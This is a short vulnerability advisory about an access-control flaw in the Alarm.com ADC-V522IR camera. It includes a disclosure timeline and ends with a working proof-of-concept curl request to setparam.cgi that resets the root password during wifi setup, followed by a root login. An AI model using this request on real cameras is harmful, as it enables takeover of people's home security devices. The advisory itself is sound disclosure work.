Title: CVE-2018-19588: Alarm.com ADC-V522IR 0100b9 Incorrect access controls.
Affected Vendor: Alarm.com
Affected Product: ADC-V522IR
Affected Version: 0100b9, potentially others
Platform: Embedded Linux
Impact: Privilege Escalation
Attack vector: HTTP
CVE ID: CVE-2018-19588, CVE-2019-9657
Any user with access to the Alarm.com camera can access the web administration console.
Alarm.com did not sanatize Vivotek's commands to ensure the root password could not be altered upon setup of the camera through the web administration interface. By sending the below request to the wifi setup process, the attacker has effectively reset the root password and is now given access to the camera. This allows the attacker to change and alter any of the preconfigured settings. In addition, it allows the attacker to download and restore a backup of the /etc/ directory that is customized for Alarm.com configuration.
Vendor is working on an update.
VFX Team.
Jul 12, 2019 - Vendor responded.
Jul 9, 2019 - Published.
Mar 8, 2019 - Vendor responded, but did not have any additional information.
Jan 2, 2019 - Vendor contacted.
Dec 7, 2018 - Vendor contacted.
Nov 26, 2018 - Proof of concept disclosed to vendor.
Oct 22, 2018 - Vendor contacted.
Connect to the camera wifi on setup.
curl -v http://192.168.1.1/cgi-bin/admin/setparam.cgi?security_user_i0_pass=password
Connect camera to ethernet.
Login as root/password.